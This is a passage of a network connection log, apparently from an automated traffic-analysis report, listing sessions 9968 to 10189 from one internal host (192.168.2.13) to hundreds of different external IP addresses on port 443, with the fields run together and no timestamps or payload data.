                                                9968192.168.2.1333036200.72.171.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9969192.168.2.135777081.185.92.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9970192.168.2.1357088153.197.181.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9971192.168.2.134904246.111.139.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9972192.168.2.1352904208.64.248.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9973192.168.2.1338756185.227.189.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9974192.168.2.1358782188.230.131.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9975192.168.2.135599273.132.175.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9976192.168.2.135941484.49.133.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9977192.168.2.1358616194.35.235.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9978192.168.2.1334536179.0.18.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9979192.168.2.1344178165.220.15.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9980192.168.2.1358518145.113.82.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9981192.168.2.1348432221.133.12.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9982192.168.2.1346722134.165.206.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9983192.168.2.135390434.69.162.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9984192.168.2.1349114210.161.104.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9985192.168.2.134829695.164.21.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9986192.168.2.1356740170.21.146.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9987192.168.2.133399295.226.133.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9988192.168.2.1346560102.120.226.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9989192.168.2.134273491.117.76.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9990192.168.2.1337114148.29.78.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9991192.168.2.1348520140.122.187.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9992192.168.2.1339016136.93.126.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9993192.168.2.135547247.33.36.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9994192.168.2.1350144135.43.125.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9995192.168.2.1333182147.202.83.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9996192.168.2.1337424210.147.46.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9997192.168.2.13389801.49.25.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9998192.168.2.135326249.229.87.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9999192.168.2.1350046149.243.156.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10000192.168.2.1346568137.38.89.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10001192.168.2.135168843.158.190.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10002192.168.2.1353084118.122.7.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10003192.168.2.1335864128.237.174.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10004192.168.2.1339384183.23.80.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10005192.168.2.134105667.251.77.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10006192.168.2.135010893.126.135.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10007192.168.2.134590497.121.3.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10008192.168.2.1333682209.70.178.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10009192.168.2.134547488.66.5.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10010192.168.2.1350418191.204.56.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10011192.168.2.1337330131.45.10.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10012192.168.2.1339688191.66.232.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10013192.168.2.1360656132.204.0.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10014192.168.2.1344534163.109.66.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10015192.168.2.133566440.137.58.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10016192.168.2.133685260.191.191.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10017192.168.2.1339462216.82.105.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10018192.168.2.1345412192.188.136.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10019192.168.2.1348990124.252.18.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10020192.168.2.135498880.102.247.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10021192.168.2.13538048.175.78.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10022192.168.2.135430224.87.209.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10023192.168.2.1347598124.34.107.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10024192.168.2.134229839.221.51.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10025192.168.2.135705044.254.21.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10026192.168.2.135230490.131.77.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10027192.168.2.1349836206.212.118.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10028192.168.2.135259677.246.7.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10029192.168.2.1334678187.225.141.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10030192.168.2.134361499.9.82.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10031192.168.2.1350980132.69.20.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10032192.168.2.135765868.212.232.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10033192.168.2.1356282220.33.64.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10034192.168.2.1337052157.82.219.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10035192.168.2.1346058106.23.66.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10036192.168.2.134476068.3.191.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10037192.168.2.1342780165.20.188.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10038192.168.2.1341552102.53.20.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10039192.168.2.1335756135.194.89.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10040192.168.2.135486064.18.153.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10041192.168.2.133875485.188.160.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10042192.168.2.135656688.85.240.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10043192.168.2.135379469.98.9.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10044192.168.2.1348718150.61.133.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10045192.168.2.135404094.134.146.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10046192.168.2.1354956199.13.92.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10047192.168.2.1358246124.119.116.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10048192.168.2.134553882.5.215.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10049192.168.2.1335448129.90.19.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10050192.168.2.1358726167.152.46.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10051192.168.2.1351242207.254.193.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10052192.168.2.134897085.160.112.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10053192.168.2.135187019.187.117.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10054192.168.2.1358256148.159.229.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10055192.168.2.1341968212.50.109.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10056192.168.2.1339586110.169.157.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10057192.168.2.135124818.222.240.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10058192.168.2.1355146141.62.200.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10059192.168.2.1337838117.210.119.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10060192.168.2.1333266131.145.84.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10061192.168.2.1340176188.33.15.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10062192.168.2.133399844.117.106.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10063192.168.2.1342062207.6.5.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10064192.168.2.134340490.59.127.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10065192.168.2.1350340147.93.104.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10066192.168.2.134928253.171.65.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10067192.168.2.1336556143.56.155.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10068192.168.2.133444053.222.48.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10069192.168.2.1353156130.153.228.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10070192.168.2.1335018187.126.56.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10071192.168.2.133615237.172.81.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10072192.168.2.135788044.9.26.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10073192.168.2.1347002219.218.119.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10074192.168.2.1351674123.142.214.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10075192.168.2.135128265.177.93.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10076192.168.2.1355272194.54.179.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10077192.168.2.134130473.66.70.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10078192.168.2.134152251.77.112.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10079192.168.2.1356684166.191.176.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10080192.168.2.1340592188.3.145.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10081192.168.2.135774068.61.97.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10082192.168.2.1350342161.145.147.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10083192.168.2.1354154142.241.19.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10084192.168.2.1338674103.140.33.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10085192.168.2.1338384126.160.254.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10086192.168.2.1358406203.161.228.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10087192.168.2.133855835.161.159.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10088192.168.2.1345238141.92.211.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10089192.168.2.134871012.230.169.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10090192.168.2.1353630124.137.199.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10091192.168.2.134758863.183.209.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10092192.168.2.135017686.183.44.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10093192.168.2.134557897.168.95.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10094192.168.2.133756023.123.253.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10095192.168.2.133349652.143.146.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10096192.168.2.1338366113.195.186.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10097192.168.2.135777831.121.126.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10098192.168.2.1340606108.119.31.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10099192.168.2.1343794129.77.93.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10100192.168.2.135960262.169.59.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10101192.168.2.135117259.166.40.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10102192.168.2.1336312149.127.140.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10103192.168.2.1346350203.49.205.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10104192.168.2.135045424.113.97.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10105192.168.2.1360650143.47.3.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10106192.168.2.1346422208.142.77.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10107192.168.2.133382487.15.122.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10108192.168.2.1335568135.150.148.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10109192.168.2.1351218174.41.205.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10110192.168.2.1337192159.143.240.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10111192.168.2.133414697.149.136.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10112192.168.2.1338192190.163.151.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10113192.168.2.1351692221.71.243.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10114192.168.2.135487034.119.212.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10115192.168.2.1333730144.251.187.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10116192.168.2.1340828160.53.107.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10117192.168.2.1360726131.213.72.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10118192.168.2.1355036154.45.85.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10119192.168.2.1337568124.182.100.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10120192.168.2.134833239.65.115.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10121192.168.2.1336832223.97.118.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10122192.168.2.134819868.53.177.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10123192.168.2.134477265.42.144.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10124192.168.2.1335540184.145.199.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10125192.168.2.134264488.104.194.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10126192.168.2.1335742171.169.18.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10127192.168.2.1357060169.105.3.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10128192.168.2.1353494136.78.127.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10129192.168.2.134553213.44.158.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10130192.168.2.1339562197.100.218.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10131192.168.2.1337752164.248.175.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10132192.168.2.134191823.64.72.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10133192.168.2.1335600120.145.41.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10134192.168.2.1337730157.155.101.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10135192.168.2.133999434.139.58.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10136192.168.2.1350344174.132.145.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10137192.168.2.1349646167.102.30.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10138192.168.2.1338714172.81.241.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10139192.168.2.1344558212.150.29.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10140192.168.2.134876090.84.170.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10141192.168.2.134134452.33.159.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10142192.168.2.1345320121.48.81.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10143192.168.2.1351338128.148.171.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10144192.168.2.1355298193.151.227.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10145192.168.2.133585864.153.47.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10146192.168.2.1351856114.166.225.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10147192.168.2.134124676.238.28.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10148192.168.2.1336608136.90.146.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10149192.168.2.1334060175.137.149.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10150192.168.2.1358630121.96.218.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10151192.168.2.1359056200.101.36.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10152192.168.2.135963479.162.93.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10153192.168.2.1353104206.99.82.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10154192.168.2.1358120199.192.35.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10155192.168.2.135770065.141.108.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10156192.168.2.1356218188.136.71.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10157192.168.2.135831469.149.224.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10158192.168.2.13575449.164.171.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10159192.168.2.1351106142.43.171.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10160192.168.2.134166818.126.160.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10161192.168.2.134025875.73.152.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10162192.168.2.1344086164.196.64.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10163192.168.2.133593485.176.26.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10164192.168.2.1333640202.184.252.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10165192.168.2.1340992144.108.97.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10166192.168.2.1351794112.181.51.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10167192.168.2.1359442123.10.162.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10168192.168.2.133358453.19.199.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10169192.168.2.1359398106.1.212.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10170192.168.2.1359394128.115.116.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10171192.168.2.1340298205.239.214.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10172192.168.2.1346866185.164.182.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10173192.168.2.13388784.98.35.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10174192.168.2.133720477.119.149.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10175192.168.2.1356838103.223.167.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10176192.168.2.1337032145.206.175.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10177192.168.2.1352900155.55.70.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10178192.168.2.1345058123.240.135.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10179192.168.2.1334444221.118.35.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10180192.168.2.134501687.28.117.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10181192.168.2.1336870104.239.171.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10182192.168.2.1353746200.192.231.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10183192.168.2.1349222180.164.153.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10184192.168.2.1336554147.58.22.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10185192.168.2.135640438.190.184.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10186192.168.2.13558105.93.74.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10187192.168.2.1337422147.76.182.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10188192.168.2.1350732185.55.8.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10189192.168.2.135195299.34.217.73443
                                                TimestampBytes transferredDirectionData


